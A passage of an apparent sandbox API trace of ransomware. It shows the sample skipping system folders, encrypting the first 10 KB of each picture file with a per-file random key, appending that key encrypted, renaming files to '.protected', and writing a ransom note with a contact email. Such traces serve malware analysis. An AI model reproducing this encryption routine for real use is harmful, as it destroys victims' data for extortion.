lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0092.556] lstrlenA (lpString="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") returned 684 [0092.556] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0092.556] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.556] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0092.556] CloseHandle (hObject=0xb4) returned 1 [0092.557] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.557] lstrcmpiW (lpString1="p-m8kwix.bmp", lpString2="Windows") returned -1 [0092.557] lstrcmpiW (lpString1="p-m8kwix.bmp", lpString2="Program Files") returned -1 [0092.557] lstrcmpiW (lpString1="p-m8kwix.bmp", lpString2="Program Files (x86)") returned -1 [0092.557] lstrcmpiW (lpString1="p-m8kwix.bmp", lpString2="$Recycle.bin") returned 1 [0092.557] lstrcmpiW (lpString1="p-m8kwix.bmp", lpString2="System Volume Information") returned -1 [0092.557] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\p-m8kwix.bmp") returned 55 [0092.557] StrStrIW (lpFirst="p-m8kwix.bmp", lpSrch=".protected") returned 0x0 [0092.557] lstrcmpW (lpString1="p-m8kwix.bmp", lpString2="RESTORE_FILES.txt") returned -1 [0092.557] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: 
pbBuffer=0x295f12c) returned 1 [0092.557] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.557] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\p-m8kwix.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\p-m8kwix.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.558] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\p-m8kwix.bmp") returned 55 [0092.558] StrStrW (lpFirst="p-m8kwix.bmp", lpSrch=".txt") returned 0x0 [0092.558] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\p-m8kwix.bmp") returned 55 [0092.558] StrStrW (lpFirst="p-m8kwix.bmp", lpSrch=".rar") returned 0x0 [0092.558] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\p-m8kwix.bmp") returned 55 [0092.558] StrStrW (lpFirst="p-m8kwix.bmp", lpSrch=".zip") returned 0x0 [0092.558] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.559] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.559] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.560] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.560] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, 
lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.560] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.560] CloseHandle (hObject=0xb4) returned 1 [0092.560] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\p-m8kwix.bmp.protected") returned 65 [0092.560] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\p-m8kwix.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\p-m8kwix.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\p-m8kwix.bmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\p-m8kwix.bmp.protected")) returned 1 [0092.562] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.562] lstrcmpiW (lpString1="qDNUfsmEozG2hmfeOlO", lpString2="Windows") returned -1 [0092.562] lstrcmpiW (lpString1="qDNUfsmEozG2hmfeOlO", lpString2="Program Files") returned 1 [0092.562] lstrcmpiW (lpString1="qDNUfsmEozG2hmfeOlO", lpString2="Program Files (x86)") returned 1 [0092.562] lstrcmpiW (lpString1="qDNUfsmEozG2hmfeOlO", lpString2="$Recycle.bin") returned 1 [0092.562] lstrcmpiW (lpString1="qDNUfsmEozG2hmfeOlO", lpString2="System Volume Information") returned -1 [0092.562] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO") returned 62 [0092.562] lstrcmpW (lpString1="qDNUfsmEozG2hmfeOlO", lpString2=".") returned 1 [0092.562] lstrcmpW (lpString1="qDNUfsmEozG2hmfeOlO", lpString2="..") returned 1 [0092.562] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\*") returned 64 [0092.562] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0092.562] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.562] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.562] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.562] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.563] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.563] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\.") returned 64 [0092.563] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.563] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.563] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.563] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.563] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.563] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.563] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.563] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\..") returned 65 [0092.563] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.563] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.563] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.563] lstrcmpiW (lpString1="gPVKT3GsVOZSJb.bmp", lpString2="Windows") returned -1 [0092.563] lstrcmpiW 
(lpString1="gPVKT3GsVOZSJb.bmp", lpString2="Program Files") returned -1 [0092.563] lstrcmpiW (lpString1="gPVKT3GsVOZSJb.bmp", lpString2="Program Files (x86)") returned -1 [0092.563] lstrcmpiW (lpString1="gPVKT3GsVOZSJb.bmp", lpString2="$Recycle.bin") returned 1 [0092.563] lstrcmpiW (lpString1="gPVKT3GsVOZSJb.bmp", lpString2="System Volume Information") returned -1 [0092.563] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\gPVKT3GsVOZSJb.bmp") returned 81 [0092.563] StrStrIW (lpFirst="gPVKT3GsVOZSJb.bmp", lpSrch=".protected") returned 0x0 [0092.563] lstrcmpW (lpString1="gPVKT3GsVOZSJb.bmp", lpString2="RESTORE_FILES.txt") returned -1 [0092.563] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.563] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.563] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\gPVKT3GsVOZSJb.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdnufsmeozg2hmfeolo\\gpvkt3gsvozsjb.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.564] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\gPVKT3GsVOZSJb.bmp") returned 81 [0092.564] StrStrW (lpFirst="gPVKT3GsVOZSJb.bmp", lpSrch=".txt") returned 0x0 [0092.564] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\gPVKT3GsVOZSJb.bmp") returned 81 [0092.564] StrStrW (lpFirst="gPVKT3GsVOZSJb.bmp", lpSrch=".rar") returned 0x0 [0092.564] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\gPVKT3GsVOZSJb.bmp") 
returned 81 [0092.564] StrStrW (lpFirst="gPVKT3GsVOZSJb.bmp", lpSrch=".zip") returned 0x0 [0092.564] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.565] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.565] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.565] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.565] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.565] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.565] CloseHandle (hObject=0xd4) returned 1 [0092.566] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\gPVKT3GsVOZSJb.bmp.protected") returned 91 [0092.566] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\gPVKT3GsVOZSJb.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdnufsmeozg2hmfeolo\\gpvkt3gsvozsjb.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\gPVKT3GsVOZSJb.bmp.protected" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\pictures\\qdnufsmeozg2hmfeolo\\gpvkt3gsvozsjb.bmp.protected")) returned 1 [0092.567] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.567] lstrcmpiW (lpString1="MYOVHx_w_H1c1t.gif", lpString2="Windows") returned -1 [0092.567] lstrcmpiW (lpString1="MYOVHx_w_H1c1t.gif", lpString2="Program Files") returned -1 [0092.567] lstrcmpiW (lpString1="MYOVHx_w_H1c1t.gif", lpString2="Program Files (x86)") returned -1 [0092.567] lstrcmpiW (lpString1="MYOVHx_w_H1c1t.gif", lpString2="$Recycle.bin") returned 1 [0092.567] lstrcmpiW (lpString1="MYOVHx_w_H1c1t.gif", lpString2="System Volume Information") returned -1 [0092.567] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\MYOVHx_w_H1c1t.gif") returned 81 [0092.567] StrStrIW (lpFirst="MYOVHx_w_H1c1t.gif", lpSrch=".protected") returned 0x0 [0092.567] lstrcmpW (lpString1="MYOVHx_w_H1c1t.gif", lpString2="RESTORE_FILES.txt") returned -1 [0092.567] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.567] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.567] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\MYOVHx_w_H1c1t.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdnufsmeozg2hmfeolo\\myovhx_w_h1c1t.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.568] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\MYOVHx_w_H1c1t.gif") returned 81 [0092.568] StrStrW (lpFirst="MYOVHx_w_H1c1t.gif", lpSrch=".txt") returned 0x0 [0092.568] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\MYOVHx_w_H1c1t.gif") returned 81 [0092.568] StrStrW (lpFirst="MYOVHx_w_H1c1t.gif", lpSrch=".rar") returned 0x0 [0092.568] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\MYOVHx_w_H1c1t.gif") returned 81 [0092.568] StrStrW (lpFirst="MYOVHx_w_H1c1t.gif", lpSrch=".zip") returned 0x0 [0092.568] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.568] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.568] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.569] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.569] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.569] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.569] CloseHandle (hObject=0xd4) returned 1 [0092.570] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\MYOVHx_w_H1c1t.gif.protected") returned 91 [0092.570] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\MYOVHx_w_H1c1t.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdnufsmeozg2hmfeolo\\myovhx_w_h1c1t.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\MYOVHx_w_H1c1t.gif.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdnufsmeozg2hmfeolo\\myovhx_w_h1c1t.gif.protected")) returned 1 [0092.571] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.571] lstrcmpiW (lpString1="oQwknfGJJeI-Z-Df51.bmp", lpString2="Windows") returned -1 [0092.571] lstrcmpiW (lpString1="oQwknfGJJeI-Z-Df51.bmp", lpString2="Program Files") returned -1 [0092.571] lstrcmpiW (lpString1="oQwknfGJJeI-Z-Df51.bmp", lpString2="Program Files (x86)") returned -1 [0092.571] lstrcmpiW (lpString1="oQwknfGJJeI-Z-Df51.bmp", lpString2="$Recycle.bin") returned 1 [0092.571] lstrcmpiW (lpString1="oQwknfGJJeI-Z-Df51.bmp", lpString2="System Volume Information") returned -1 [0092.571] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\oQwknfGJJeI-Z-Df51.bmp") returned 85 [0092.571] StrStrIW (lpFirst="oQwknfGJJeI-Z-Df51.bmp", lpSrch=".protected") returned 0x0 [0092.571] lstrcmpW (lpString1="oQwknfGJJeI-Z-Df51.bmp", lpString2="RESTORE_FILES.txt") returned -1 [0092.571] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.571] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.571] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\oQwknfGJJeI-Z-Df51.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdnufsmeozg2hmfeolo\\oqwknfgjjei-z-df51.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.572] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\oQwknfGJJeI-Z-Df51.bmp") returned 85 [0092.572] StrStrW (lpFirst="oQwknfGJJeI-Z-Df51.bmp", lpSrch=".txt") returned 0x0 [0092.572] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\oQwknfGJJeI-Z-Df51.bmp") returned 85 [0092.572] StrStrW (lpFirst="oQwknfGJJeI-Z-Df51.bmp", lpSrch=".rar") returned 0x0 [0092.572] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\oQwknfGJJeI-Z-Df51.bmp") returned 85 [0092.572] StrStrW (lpFirst="oQwknfGJJeI-Z-Df51.bmp", lpSrch=".zip") returned 0x0 [0092.572] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.573] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.573] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.573] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.573] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.574] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, 
lpOverlapped=0x0) returned 1 [0092.574] CloseHandle (hObject=0xd4) returned 1 [0092.574] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\oQwknfGJJeI-Z-Df51.bmp.protected") returned 95 [0092.574] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\oQwknfGJJeI-Z-Df51.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdnufsmeozg2hmfeolo\\oqwknfgjjei-z-df51.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\oQwknfGJJeI-Z-Df51.bmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdnufsmeozg2hmfeolo\\oqwknfgjjei-z-df51.bmp.protected")) returned 1 [0092.575] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.575] lstrcmpiW (lpString1="W-ZqjcBjJJ3u4Dz_GIV.gif", lpString2="Windows") returned 1 [0092.575] lstrcmpiW (lpString1="W-ZqjcBjJJ3u4Dz_GIV.gif", lpString2="Program Files") returned 1 [0092.575] lstrcmpiW (lpString1="W-ZqjcBjJJ3u4Dz_GIV.gif", lpString2="Program Files (x86)") returned 1 [0092.575] lstrcmpiW (lpString1="W-ZqjcBjJJ3u4Dz_GIV.gif", lpString2="$Recycle.bin") returned 1 [0092.575] lstrcmpiW (lpString1="W-ZqjcBjJJ3u4Dz_GIV.gif", lpString2="System Volume Information") returned 1 [0092.575] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\W-ZqjcBjJJ3u4Dz_GIV.gif") returned 86 [0092.575] StrStrIW (lpFirst="W-ZqjcBjJJ3u4Dz_GIV.gif", lpSrch=".protected") returned 0x0 [0092.575] lstrcmpW (lpString1="W-ZqjcBjJJ3u4Dz_GIV.gif", lpString2="RESTORE_FILES.txt") returned 1 [0092.575] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.575] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, 
pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.575] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\W-ZqjcBjJJ3u4Dz_GIV.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdnufsmeozg2hmfeolo\\w-zqjcbjjj3u4dz_giv.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.576] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\W-ZqjcBjJJ3u4Dz_GIV.gif") returned 86 [0092.576] StrStrW (lpFirst="W-ZqjcBjJJ3u4Dz_GIV.gif", lpSrch=".txt") returned 0x0 [0092.576] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\W-ZqjcBjJJ3u4Dz_GIV.gif") returned 86 [0092.576] StrStrW (lpFirst="W-ZqjcBjJJ3u4Dz_GIV.gif", lpSrch=".rar") returned 0x0 [0092.576] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\W-ZqjcBjJJ3u4Dz_GIV.gif") returned 86 [0092.576] StrStrW (lpFirst="W-ZqjcBjJJ3u4Dz_GIV.gif", lpSrch=".zip") returned 0x0 [0092.576] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: 